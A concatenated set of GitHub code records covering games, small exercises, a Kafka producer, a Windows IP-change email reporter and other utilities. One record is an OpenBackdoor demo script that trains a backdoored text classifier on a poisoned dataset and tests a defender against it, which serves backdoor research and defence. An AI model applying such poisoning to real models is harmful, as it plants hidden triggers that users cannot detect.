scoreFont.render(scoreAPoint, True, scoreColor, scoreBackground)\n scoreRect = score.get_rect() \n scoreRect.topleft = (50, 90)\n screen.blit(score,scoreRect)\n\n hpFont = pygame.font.Font('freesansbold.ttf', 32) \n theHp = hpFont.render(myHp, True, hpColor, hpBackgroundColor)\n hpRect = theHp.get_rect() \n hpRect.topleft = (50, 50)\n screen.blit(theHp,hpRect)\n\n if scorePoint >= 30:\n screen.fill(newColor)\n\n winFont = pygame.font.Font('Modak-Devanagari.ttf', 100) \n win = winFont.render(\"You won!!!\", True, winColor, winBackgroundColor)\n winRect = win.get_rect() \n winRect.center = (width // 2, height //2)\n screen.blit(win,winRect)\n \n if hp <= 0:\n screen.fill(dieColor)\n\n dieFont = pygame.font.Font('Modak-Devanagari.ttf', 100) \n death = dieFont.render(\"nooooo\", True, deathColor, deathBackgroundColor)\n dieRect = death.get_rect() \n dieRect.center = (width // 2, height //2)\n screen.blit(death,dieRect)\n \n\n #updates it\n pygame.display.flip()\n\n\n#game loop\nif __name__ == '__main__':\n main() ","repo_name":"chickenLemonade/SavannaHunt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29353287469","text":"n1=eval(input(\"numero 1:\" ))\nn2=eval(input(\"numero 2:\" ))\nn3=eval(input(\"numero 3:\" ))\nif (n1 < n2 and n1 < n3):\n primero = n1\n if (n2 < n3):\n segundo = n2\n tercero = n3\n else:\n segundo = n3\n tercero = n2\nelse:\n if (n2 < n1 and n2 < n3):\n primero = n2\n if n1 < n3:\n segundo= n1\n tercero= n3\n else:\n segundo= n3\n tercero= n1\n else:\n if (n3 < n2 and n3 < n1):\n primero= n3\n if n2 < n1:\n segundo= n2\n tercero= n1\n else:\n segundo= n1\n tercero= n2\nprint(\"{},{},{}\".format(primero,segundo,tercero))\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej6/hito1_ej6_980a07121860431860aa7d3179da7a85.py","file_name":"hito1_ej6_980a07121860431860aa7d3179da7a85.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23564770612","text":"# Defend\nimport os\nimport json\nimport argparse\nimport openbackdoor as ob \nfrom openbackdoor.data import load_dataset, get_dataloader, wrap_dataset\nfrom openbackdoor.victims import load_victim\nfrom openbackdoor.attackers import load_attacker\nfrom openbackdoor.defenders import load_defender\nfrom openbackdoor.utils import set_config, logger, set_seed\nfrom openbackdoor.utils.visualize import display_results\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', type=str, default='./configs/base_config.json')\n parser.add_argument('--seed', type=int, default=42)\n args = parser.parse_args()\n return args\n\ndef main(config):\n # choose a victim classification model \n victim = load_victim(config[\"victim\"])\n # choose attacker and initialize it with default parameters \n attacker = load_attacker(config[\"attacker\"])\n defender = load_defender(config[\"defender\"])\n # choose target and poison dataset\n target_dataset = load_dataset(**config[\"target_dataset\"]) \n poison_dataset = load_dataset(**config[\"poison_dataset\"]) \n # target_dataset = attacker.poison(victim, target_dataset)\n # launch attacks \n logger.info(\"Train backdoored model on {}\".format(config[\"poison_dataset\"][\"name\"]))\n backdoored_model = attacker.attack(victim, poison_dataset, config, defender)\n logger.info(\"Evaluate backdoored model on {}\".format(config[\"target_dataset\"][\"name\"]))\n results = attacker.eval(backdoored_model, target_dataset, defender)\n \n display_results(config, results)\n \n # Fine-tune on clean dataset\n '''\n print(\"Fine-tune model on {}\".format(config[\"target_dataset\"][\"name\"]))\n CleanTrainer = ob.BaseTrainer(config[\"train\"])\n backdoored_model = CleanTrainer.train(backdoored_model, wrap_dataset(target_dataset, config[\"train\"][\"batch_size\"]))\n '''\n\nif __name__=='__main__':\n args = parse_args()\n with open(args.config_path, 'r') as f:\n config = json.load(f)\n \n config = set_config(config)\n set_seed(args.seed)\n\n main(config)\n","repo_name":"thunlp/OpenBackdoor","sub_path":"demo_defend.py","file_name":"demo_defend.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"} +{"seq_id":"74723888247","text":"def collect_stuff(*args):\n# The parameter type is a tuple\n print(type(args))\n print(args)\n print(sum(args))\n\n\n\ncollect_stuff(1,3, 5)\n\ndef my_max(*numbers):\n greatest = numbers[0]\n for number in numbers:\n if (number > greatest):\n greatest = number\n\n return greatest\n\n\nprint(my_max(1, 4, 10, 5, 14, -7))","repo_name":"Benneee/Take-Python-Serious","sub_path":"15-Tuples/variable-number-of-function-arguments-with-*args.py","file_name":"variable-number-of-function-arguments-with-*args.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"4515220882","text":"import numpy\nimport pandas\nfrom grplot.features.optimizer.optimizer_key import optimizer_key\n\n\ndef optimizer_analytic(df, variables, mode):\n # key\n key = numpy.array([])\n if type(variables) == list:\n key = numpy.concatenate([key, optimizer_key(var_list=variables)])\n elif type(variables) == numpy.ndarray:\n key = numpy.concatenate([key, variables])\n else:\n raise Exception('Unsupported variables type!')\n # key length check\n if len(key) > 0:\n # filter data\n if type(df) == dict:\n df_ = {}\n for k in numpy.unique(key):\n if k in df.keys():\n if type(df[k]) == list:\n if mode in ['numpy','saver']:\n df_[k] = numpy.array(df[k])\n elif mode in ['pandas','perf']:\n df_ = pandas.DataFrame.from_dict({k: df[k] for k in numpy.unique(key) if k in df.keys()})\n break\n else:\n raise Exception('Unknown optimizer argument!')\n elif type(df[k]) == numpy.ndarray:\n if mode in ['numpy','saver']:\n df_[k] = df[k]\n elif mode in ['pandas','perf']:\n df_ = pandas.DataFrame.from_dict({k: df[k] for k in numpy.unique(key) if k in df.keys()})\n break\n else:\n raise Exception('Unknown optimizer argument!')\n else:\n raise Exception('Unsupported dictionary sub data structure!')\n else:\n pass\n elif type(df) == pandas.core.frame.DataFrame:\n if mode in ['numpy','saver']:\n df_ = {k: df[[k]].to_records()[k] for k in numpy.unique(key) if k in df}\n elif mode in ['pandas','perf']:\n df_ = df[[k for k in numpy.unique(key) if k in df]]\n # if there is only one column\n if type(df_) == pandas.core.series.Series:\n df_ = pandas.DataFrame(df_)\n else:\n pass\n else:\n raise Exception('Unknown optimizer argument!')\n else:\n raise Exception('Unsupported data structure!')\n else:\n raise Exception('Wrong data type of axis!')\n return df_","repo_name":"ghiffaryr/grplot","sub_path":"grplot/features/optimizer/optimizer_analytic.py","file_name":"optimizer_analytic.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"7967195615","text":"import time\nimport datetime\nimport logging\nimport keys\n\n# ----------------------------------------------------------------------------------------------------------\n# Allgemein\n# ----------------------------------------------------------------------------------------------------------\n\n# setup für logging\nlogging.basicConfig(filename='comparison.log', level=logging.INFO)\n\n\n# ----------------------------------------------------------------------------------------------------------\n# Funktionen\n# ----------------------------------------------------------------------------------------------------------\n\ndef compare(upper_bauschein, lower_bauschein, tank, leitung):\n \"\"\"vergleicht Kennziffern\"\"\"\n\n # timestamp\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n\n # Vergleich\n if upper_bauschein == tank and lower_bauschein == leitung:\n print('Check Erfolgreich')\n logging.info(st + \" - Vergleich Erfolgreich - \" + upper_bauschein + lower_bauschein + tank + leitung)\n return 1\n elif upper_bauschein == tank and lower_bauschein != leitung:\n print('Check Fehlgeschlagen: Kennziffer des Tanks auf dem Bauschein stimmt nicht mit dem entsprechenden '\n 'DMC-Code überein!')\n logging.info(st + \" - Vergleich fehlgeschlagen - \" + upper_bauschein + lower_bauschein + tank + leitung)\n return 2\n elif upper_bauschein != tank and lower_bauschein == leitung:\n print('Check Fehlgeschlagen: Kennziffer der Leitung auf dem Bauschein stimmt nicht mit dem entsprechenden '\n 'DMC-Code überein!')\n logging.info(st + \" - Vergleich fehlgeschlagen - \" + upper_bauschein + lower_bauschein + tank + leitung)\n return 3\n else:\n print('Check Fehlgeschlagen: Kennziffer der Leitung und des Tanks auf dem Bauschein stimmt nicht mit dem '\n 'entsprechenden DMC-Code überein!')\n logging.info(st + \" - Vergleich fehlgeschlagen - \" + upper_bauschein + lower_bauschein + tank + leitung)\n return 4\n\n\ndef start_comparison(upper_bauschein, lower_bauschein, tank, leitung):\n \"\"\"überprüft Kennziffern und startet Vergleich\"\"\"\n\n # lädt Listen aus 'keys'-Modul\n tank_list = keys.get_tank_keys()\n leitung_list = keys.get_leitung_keys()\n\n # hier wird überprüft, ob die Kennziffern registriert sind\n upper_bauschein_check = check(upper_bauschein, tank_list)\n lower_bauschein_check = check(lower_bauschein, leitung_list)\n tank_check = check(tank, tank_list)\n leitung_check = check(leitung, leitung_list)\n\n # falls alle checks erfolgreich sind wird verglichen\n if upper_bauschein_check and lower_bauschein_check and tank_check and leitung_check:\n return compare(upper_bauschein, lower_bauschein, tank, leitung)\n else:\n print(\"Bitte überprüfen Sie Ihre Eingabe.\")\n logging.info(\"Ungültige Kennziffer - \" + upper_bauschein + lower_bauschein + tank + leitung)\n return 5\n\n\ndef check(key, key_list):\n \"\"\"überprüft, ob Kennziffern registriert sind\"\"\"\n # schaut ob ein Format vorliegt, das in einen String gewandelt werden kann\n if isinstance(key, int) or isinstance(key, float):\n key = str(key)\n # entfernt alle whitespaces und Kommas\n if isinstance(key, str):\n key = key.replace(\" \", \"\")\n key = key.replace(\",\", \"\")\n # überprüft, ob String leer ist\n if isinstance(key, str) and not len(key) == 0:\n for i in key_list:\n if key in i[len(i)-1]:\n return True\n return False\n","repo_name":"informatik-heilbronn/provapi","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21645399083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 20:30:39 2017\r\n\r\n@author: Aluno\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport cv2 \r\n\r\nimg = cv2 . imread ( 'messi5.jpg' , 0 ) \r\ncv2 . imshow ( 'imagem' , img ) \r\nk = cv2.waitKey (0)# e 0xFF\r\nif k == 27 : # aguarde a tecla ESC para sair do \r\n cv2 . destroyAllWindows () \r\nelif k == ord ( 's' ): # aguarde a tecla 's' para salvar e sair\r\n cv2 . imwrite ( 'messigray.png' , img ) \r\n cv2 . destroyAllWindows ()","repo_name":"roneybraz/OPENCV","sub_path":"teste02.py","file_name":"teste02.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26182907214","text":"# -*- coding: utf-8 -*-\n\nimport confluent_kafka\nimport time\nimport logging as log\n\nfrom colorama import Fore\n\nfrom confluent_kafka.cimpl import Message\nfrom confluent_kafka.cimpl import KafkaException\n\n\nclass Producer(object):\n def __init__(self,\n conf: dict,\n produce_fail_retry_count,\n produce_fail_retry_wait_time,\n callback=None):\n self.produce_fail_retry_count = produce_fail_retry_count\n self.produce_fail_retry_wait_time = produce_fail_retry_wait_time\n\n self.pd = confluent_kafka.Producer(conf)\n self.callback = callback\n\n def produces(self, topic, values: list, key=None):\n for value in values:\n retry_count = 0\n while True:\n try:\n self.pd.produce(topic,\n value,\n key=key,\n callback=self.delivery_callback)\n break\n except BufferError as e:\n log.warning(Fore.LIGHTRED_EX + 'Producer queue is full: {} messages awaiting delivery - try again'\n .format(len(self.pd)) + Fore.RESET)\n\n time.sleep(1)\n except KafkaException as e:\n log.error(Fore.RED + 'KafkaException: - {}\\n{}\\n'.format(key, e) + Fore.RESET)\n\n if retry_count >= self.produce_fail_retry_count:\n log.warning(Fore.LIGHTRED_EX + 'key: {} - skip'.format(key) + Fore.RESET)\n break\n\n time.sleep(self.produce_fail_retry_wait_time)\n retry_count += 1\n\n # Serve delivery callback queue.\n # NOTE: Since produce() is an asynchronous API this poll() call\n # will most likely not serve the delivery callback for the\n # last produce()d message.\n self.pd.poll(0)\n\n # Wait until all messages have been delivered\n # log.debug('Waiting for: {} deliveries'.format(len(self.pd)))\n self.pd.flush()\n\n def produce(self, topic, value, key=None, headers={}):\n retry_count = 0\n while True:\n try:\n self.pd.produce(topic,\n value,\n key=key,\n headers=headers,\n callback=self.delivery_callback)\n break\n except BufferError as e:\n log.warning(Fore.LIGHTRED_EX +\n 'Producer queue is full: {} messages awaiting delivery - try again'.format(len(self.pd)) +\n Fore.RESET)\n\n time.sleep(1)\n except KafkaException as e:\n log.error(Fore.RED + 'KafkaException: - {}\\n{}\\n'.format(key, e) + Fore.RESET)\n retry_count += 1\n if self.produce_fail_retry_count < retry_count:\n log.warning(Fore.LIGHTRED_EX + 'key: {} - skip'.format(key) + Fore.RESET)\n break\n time.sleep(self.produce_fail_retry_wait_time)\n\n self.pd.flush()\n\n def poll(self):\n self.pd.poll(0)\n\n def flush(self):\n self.pd.flush()\n\n def awaiting_count(self):\n return len(self.pd)\n\n def delivery_callback(self, err, msg: Message):\n msg_dict = {'topic': msg.topic(),\n 'partition': msg.partition(),\n 'offset': msg.offset(),\n 'headers': msg.headers(),\n 'key': msg.key(),\n 'value': msg.value()}\n\n if self.callback:\n self.callback(err, msg_dict)\n\n\nif __name__ == '__main__':\n\n import pprint\n\n from base.logger import set_std_logging\n\n pp = pprint.PrettyPrinter(indent=2)\n\n set_std_logging()\n\n conf = {\"bootstrap.servers\": \"ec2-13-124-71-40.ap-northeast-2.compute.amazonaws.com:9092\",\n \"request.required.acks\": 1,\n \"socket.timeout.ms\": 10000,\n \"logger\": log\n #\"debug\": \"broker,producer\"}\n }\n\n topic = \"dwdb-ods\"\n\n print(f\"Kafka Configuration:\\n{pp.pformat(conf)}\\n{topic}\\n\")\n producer = Producer(conf, 2, 10000)\n value = b\"hello\"\n key = b\"OCI_WTHR\"\n producer.produce(topic, None, key, headers={\"flag\": \"START_TABLE\"})\n producer.produce(topic, None, key, headers={\"flag\": \"START_FILE\", \"filename\": \"aaa.txt\"})\n producer.produce(topic, None, key, headers={\"flag\": \"END_TABLE\"})\n producer.flush()\n","repo_name":"etri-city-traffic-brain/traffic-data-mgmt","sub_path":"etri_data_collect_provider/online_and_realtime_loader-dj_etri/base/kafka/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"1788249482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 27 19:47:01 2020\r\n\r\n@author: tiago\r\n\"\"\"\r\n\r\n\r\nimport numpy as np # procesamiento matricial\r\nimport pandas as pd\r\nimport math\r\n\r\nfrom IPython import get_ipython\r\nipy = get_ipython()\r\nif ipy is not None:\r\n ipy.run_line_magic('matplotlib', 'inline')\r\n\r\nimport matplotlib.pyplot as plt # para mostrar imagenes\r\nplt.rcParams['image.cmap'] = 'gray'\r\nget_ipython().magic('matplotlib inline')\r\n# para leer/guardar videos\r\nimport imageio\r\n\r\n\r\n\r\n# Crear un objeto lector de videos\r\nfile_name= \"4.Video3 Terapia Rami.mp4\"\r\nprint(\"Abriendo video...\")\r\nvid_reader = imageio.get_reader(file_name)\r\n\r\n# ver los metadatos del video\r\nmdata = vid_reader.get_meta_data()\r\nprint(\"La data es:\")\r\nprint(mdata)\r\n\r\ndf = pd.DataFrame(mdata, columns = ['plugin', 'Numero de frames', 'Versión del ffmpeg.', \r\n'Codec', 'Pix_fmt', 'fps', 'source_size', 'size', 'duration (Segundos)'])\r\n\r\ndf.to_excel('Metadatos.xlsx')","repo_name":"Tiago1704/Extracci-n-de-metadatos-de-arch-de-video","sub_path":"Extrayendo metadatos de un archivo de videoV2.py","file_name":"Extrayendo metadatos de un archivo de videoV2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31915014819","text":"import pygame, sys\nimport random\nimport math\nfrom pygame.locals import *\n\nLOCAL_KEYS = [\n (K_LEFT, K_RIGHT),\n (K_a, K_d)\n]\n\nWORM_SIZE = 6\n\nWHITE=pygame.color.Color(255,255,255)\nBLACK=pygame.color.Color(0,0,0)\nTRANSPARENT_COLOR=pygame.color.Color(255,255,255, 0)\nBACKGROUND_COLOR=WHITE\n\ndef darken(color):\n return pygame.color.Color(\n round(color.r * 0.5),\n round(color.g * 0.5),\n round(color.b * 0.5)\n )\n\ndef lighten(color):\n return pygame.color.Color(\n max(150, min(255, round(color.r * 2))),\n max(150, min(255, round(color.g * 2))),\n max(150, min(255, round(color.b * 2)))\n )\n\ndef are_same_color(c1, c2):\n return c1.r == c2.r and c1.g == c2.g and c1.b == c2.b\n\ndef rect_corners(rect):\n x, y, w, h = rect\n return [\n (x+1, y+1),\n (x + w-1, y+1),\n (x+1, y + h-1),\n (x + w-1, y + h-1)\n ]\n\nclass VaryingWormStateInterval(object):\n \"\"\"A helper for keeping track of worm state. Toggles automatically between \"on\" and \"off\" with varying intervals\"\"\"\n def __init__(self):\n self.on = True\n self.length = self.randomize_length(self.on)\n\n def randomize_length(self, on):\n if on:\n return random.randint(50, 150)\n else:\n return random.randint(10, 15)\n\n def update(self):\n self.length -= 1\n if self.length <= 0:\n self.on = not self.on\n self.length = self.randomize_length(self.on)\n\n def is_on(self):\n return self.on\n\n\ndef find_worm_command(players, event):\n for p, k in zip(players, LOCAL_KEYS):\n is_keydown = event.type == KEYDOWN\n if event.key == k[0]:\n return TurnCommand(p, 'LEFT', is_keydown)\n elif event.key == k[1]:\n return TurnCommand(p, 'RIGHT', is_keydown)\n return None\n\nclass ColorWheel(object):\n def __init__(self):\n self.colors = [\n pygame.color.Color(200, 0, 0),\n pygame.color.Color(0, 200, 0),\n pygame.color.Color(0, 0, 200),\n pygame.color.Color(100, 100, 100),\n pygame.color.Color(50, 100, 150),\n pygame.color.Color(150, 100, 50)\n ]\n self.index = 0\n\n def next(self):\n ix = self.index % len(self.colors)\n color = self.colors[ix]\n self.index += 1\n return color\n\ncolor_wheel = ColorWheel()\n\ndef random_player_from_screen_rect(rect, color):\n center = rect.center\n radius = 0.8 * min(rect.width, rect.height) / 2\n\n theta = random.random() * 2 * math.pi\n x = radius * math.cos(theta)\n y = radius * math.sin(theta)\n pos = (x + center[0], y + center[1])\n return Player(pos, theta + math.pi, color)\n\nclass WormRect(object):\n def __init__(self, rect, player):\n self.rect = rect\n self.player = player\n\n def get_player(self):\n return self.player\n\n def get_rect(self):\n return self.rect\n\nclass Player(object):\n def __init__(self, pos, theta, color):\n self.original_pos = pos\n self.original_theta = theta\n self.reset()\n self.color = color\n self.state = VaryingWormStateInterval()\n\n def get_color(self):\n return self.color\n\n def get_head_color(self):\n return darken(self.color)\n\n def get_hole_color(self):\n return lighten(self.color)\n\n def is_hole(self):\n return not self.state.is_on()\n\n def turn(self, direction, start=False):\n if direction not in ['LEFT', 'RIGHT']:\n raise \"Direction must be 'LEFT' or 'RIGHT'\"\n if not start:\n if self.turning == direction:\n self.stop_turning()\n else:\n self.turning = direction\n\n def update(self, speed):\n self.state.update()\n dx = math.cos(self.heading) * speed\n dy = math.sin(self.heading) * speed\n x = self.pos[0] + dx\n y = self.pos[1] + dy\n self.pos = x, y\n\n if self.turning:\n if self.turning == 'LEFT':\n self.heading -= 0.05\n elif self.turning == 'RIGHT':\n self.heading += 0.05\n return self.pos\n\n def get_worm_rect(self, size):\n x = self.pos[0] - size/2\n y = self.pos[1] - size/2\n return WormRect(\n (x, y, size, size),\n self\n )\n\n def stop_turning(self):\n self.turning = None\n\n def is_dead(self):\n return self.dead\n\n def set_dead(self, b):\n self.dead = b\n\n def reset(self):\n self.dead = False\n self.pos = self.original_pos\n self.heading = self.original_theta\n self.turning = None\n\n\nclass FifoQueue(object):\n def __init__(self):\n self.items = []\n\n def put(self, item):\n self.items.append(item)\n\n def get(self):\n item = self.items[0]\n self.items = self.items[1:]\n return item\n\n def size(self):\n return len(self.items)\n\n def is_empty(self):\n return len(self.items)\n\n def get_items(self):\n return self.items\n\n\nclass CountdownState(object):\n def __init__(self):\n self.started = False\n\n def did_finish(self, updated_time):\n return self.get_count(updated_time) == 0\n\n def start(self, start_time):\n self.started = True\n self.start_time = start_time\n\n def did_start(self):\n return self.started\n\n def get_count(self, updated_time):\n INITIAL_COUNT = 3\n if not self.started:\n return INITIAL_COUNT\n return max(0, INITIAL_COUNT - math.ceil((updated_time - self.start_time) / 1000))\n\nclass TurnCommand(object):\n def __init__(self, player, direction, start=True):\n self.start = start\n self.player = player\n self.direction = direction\n\n def perform(self):\n self.player.turn(self.direction, self.start)\n\ndef main():\n pygame.display.init()\n pygame.font.init()\n\n recent_rects = FifoQueue()\n\n # Set up display\n DEPTH=32\n DISPLAY=pygame.display.set_mode((640,480),0,DEPTH)\n TEMPORARY_RECTS=pygame.surface.Surface(DISPLAY.get_size(),SRCALPHA,DEPTH)\n BACKBUFFER=pygame.surface.Surface(DISPLAY.get_size(),SRCALPHA,DEPTH)\n COLLISION_MASK=pygame.surface.Surface(DISPLAY.get_size(),0,8)\n\n COLLISION_MASK.fill(WHITE)\n DISPLAY.fill(BACKGROUND_COLOR)\n BACKBUFFER.fill(BACKGROUND_COLOR)\n\n # Font stuff\n font = pygame.font.SysFont(next(f for f in pygame.font.get_fonts() if 'roman' in f), 50)\n game_over = font.render(\"HE DED.\", True, BLACK)\n game_over_rt = game_over.get_rect()\n game_over_rt.center = DISPLAY.get_rect().center\n\n digits = [font.render(str(i), True, BLACK) for i in range(1, 4)]\n\n countdown = CountdownState()\n\n # Players\n colors = ColorWheel()\n players = [random_player_from_screen_rect(DISPLAY.get_rect(), colors.next())\n for _ in range(2)]\n player = players[0]\n\n # Game Loop\n start_ticks = pygame.time.get_ticks()\n exit = False\n show_collision_mask = False\n while not exit:\n worm_commands = []\n current_time = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_SPACE:\n DISPLAY.fill(BACKGROUND_COLOR)\n player.reset()\n elif event.key == K_ESCAPE:\n exit = True\n elif event.key == K_TAB:\n show_collision_mask = not show_collision_mask\n else:\n command = find_worm_command(players, event)\n if command:\n worm_commands.append(command)\n elif event.type == KEYUP:\n command = find_worm_command(players, event)\n if command:\n worm_commands.append(command)\n\n for c in worm_commands:\n c.perform()\n\n for p in players:\n if not p.is_dead():\n p.update(speed=2)\n\n # Generate the new rectangles for each player\n rts = [p.get_worm_rect(WORM_SIZE) for p in players if not p.is_dead()]\n recent_rects.put(rts)\n\n # player rects older than 10 generations get\n # \"persisted\" to screen bitmap\n if recent_rects.size() > 10:\n oldest_player_rects = recent_rects.get()\n for wrt in oldest_player_rects:\n p = wrt.get_player()\n rt = wrt.get_rect()\n if p.is_hole():\n c = p.get_hole_color()\n else:\n c = p.get_color()\n COLLISION_MASK.fill(BLACK, rt)\n BACKBUFFER.fill(c, rt)\n\n # redraw overlay\n TEMPORARY_RECTS.fill(TRANSPARENT_COLOR)\n for generation in recent_rects.get_items():\n for wrt in generation:\n rt = wrt.get_rect()\n p = wrt.get_player()\n c = p.get_head_color()\n TEMPORARY_RECTS.fill(c, rt)\n\n if show_collision_mask:\n DISPLAY.blit(COLLISION_MASK, (0,0))\n else:\n DISPLAY.blit(BACKBUFFER, (0,0))\n DISPLAY.blit(TEMPORARY_RECTS, (0,0))\n\n if all(p.is_dead() for p in players):\n DISPLAY.blit(game_over, game_over_rt.topleft)\n\n if not countdown.did_finish(current_time):\n countdown_loop(digits, TEMPORARY_RECTS, countdown)\n\n COLLISION_MASK.lock()\n for p in players:\n if p.is_dead():\n continue\n rt = p.get_worm_rect(WORM_SIZE).get_rect()\n for pt in rect_corners(rt):\n x = int(pt[0])\n y = int(pt[1])\n if x < 0 or y < 0 or x >= DISPLAY.get_width() or y >= DISPLAY.get_height():\n p.set_dead(True)\n break\n color = COLLISION_MASK.get_at((x, y))\n if not are_same_color(color, WHITE):\n BACKBUFFER.fill((250,0,0), (x, y, 3, 3))\n p.set_dead(True)\n COLLISION_MASK.unlock()\n\n pygame.display.update()\n\n pygame.time.wait(10)\n\n\ndef countdown_loop(digits, background, countdown):\n DISPLAY = pygame.display.get_surface()\n while True:\n current_time = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type==QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n sys.exit()\n elif not countdown.did_start():\n countdown.start(current_time);\n\n if countdown.did_finish(current_time):\n return\n\n DISPLAY.fill(BACKGROUND_COLOR)\n DISPLAY.blit(background, (0,0))\n digit = digits[countdown.get_count(current_time) - 1]\n\n rt = digit.get_rect()\n rt.center = DISPLAY.get_rect().center\n\n DISPLAY.blit(digit, rt)\n pygame.display.update()\n\n pygame.time.wait(100)\n\nmain()\n\n","repo_name":"epeld/snakes","sub_path":"snakes.py","file_name":"snakes.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10764384097","text":"from win32 import win32crypt\nimport wmi\n\nimport win32api\nimport win32con\nimport win32evtlog\nimport win32security\nimport win32evtlogutil\n\nimport copy\nimport hashlib\nimport json\nimport time\nimport random\nimport signal\nimport string\nimport os, sys, re\nimport requests, smtplib \nfrom email.mime.text import MIMEText\n\nclass REPORT_CONSTANT(object):\n \n CONFIG_FILE_PATH = os.path.dirname(__file__) + os.sep + \"config.conf\"\n\n CONFIGURATION = {\n \"IP_ADDR_PROVIDER\": \"http://jsonip.com\",\n \"IP_ADDR_PROVIDER_RESPONSE_TYPE\" : \"json\",\n \"IP_ADDR_PROVIDER_IP_ATTR_NAME\" : \"ip\",\n \"SENDER_INFO_PATH\" : \"{0}\".format(os.path.dirname(__file__) + os.sep + \"host.bin\"),\n \"TARGET_INFO_PATH\" : \"{0}\".format(os.path.dirname(__file__) + os.sep + \"admin.bin\"),\n \"TIME_DELTA\": 300,\n \"TITLE\" : \"[Report] Your ip address was changed.\",\n \"MESSAGE\": \"Your ip address was changed. Your current ip address is #{ip} at #{time}.\"\n }\n\n EVENT_ID = {\n 58701 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Initialize new email sender process\"]],\n 58702 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Transport success\"]],\n 58703 : [win32evtlog.EVENTLOG_ERROR_TYPE, [\"Connection disabled\"]],\n 58704 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Configuration changed\"]],\n 58705 : [win32evtlog.EVENTLOG_INFORMATION_TYPE, [\"Service exit\"]],\n 58706 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Detect improper access\"]],\n 58799 : [win32evtlog.EVENTLOG_WARNING_TYPE, [\"Missing event\"]]\n }\n\nclass SecureMailSender(object):\n SALT_LENGTH = 24\n\n @staticmethod\n def randstring(text):\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH)) + \"||\" + \\\n text + \"||\" + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(SecureMailSender.SALT_LENGTH))\n\n @staticmethod\n def build_credential_to_json(cred):\n if(isinstance(cred, dict)):\n return json.dumps(cred)\n return None\n\n @staticmethod\n def encrypt_credential(path, text):\n if(path != None):\n if(os.path.exists(path)):\n os.remove(path)\n with open(path, \"wb\") as file:\n file.write(win32crypt.CryptProtectData(SecureMailSender.randstring(text).encode('utf-8'), None, None, None, None, 0))\n return b''\n return win32crypt.CryptProtectData(SecureMailSender.randstring(text).encode('utf-8'), None, None, None, None, 0)\n\n @staticmethod\n def generate_host_id():\n c = wmi.WMI()\n seed = \"{0}{1}\".format(c.Win32_Processor()[0].ProcessorId, c.Win32_DiskDrive()[0].SerialNumber)\n return hashlib.sha256(seed.encode()).hexdigest()\n \n @staticmethod\n def decrypt_credential(path, text = None):\n result = ('', b'')\n if(path != None):\n if(os.path.exists(path)):\n with open(path, \"rb\") as file:\n line = file.read()\n result = win32crypt.CryptUnprotectData(line, None, None, None, 0)\n else:\n result = win32crypt.CryptUnprotectData(text, None, None, None, 0)\n return result[-1].decode('utf-8').split(\"||\")[1]\n\n @staticmethod\n def send_mail(sender, receiver, subject, body):\n credential = json.loads(sender)\n if(credential[\"mac\"]!=SecureMailSender.generate_host_id()):\n return (False, -1)\n try:\n smtp = smtplib.SMTP(credential[\"server\"], credential[\"port\"])\n smtp.ehlo()\n smtp.starttls()\t# TLS\n smtp.login(credential[\"email\"], credential[\"key\"])\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['To'] = receiver\n smtp.sendmail(credential[\"email\"],receiver,msg.as_string())\n smtp.quit()\n except Exception as e:\n del credential\n return (False, e)\n del credential\n return (True, None)\n\n @staticmethod\n def send_mail_s(sender, receiver, subject, body):\n credential = json.loads(sender)\n recv_accnt = json.loads(receiver)\n\n if(credential[\"mac\"]!=SecureMailSender.generate_host_id()):\n return (False, -1)\n\n try:\n smtp = smtplib.SMTP(credential[\"server\"], credential[\"port\"])\n smtp.ehlo()\n smtp.starttls()\t# TLS\n smtp.login(credential[\"email\"], credential[\"key\"])\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['To'] = recv_accnt[\"email\"]\n smtp.sendmail(credential[\"email\"], recv_accnt[\"email\"], msg.as_string())\n smtp.quit()\n except Exception as e:\n del credential\n return (False, e)\n 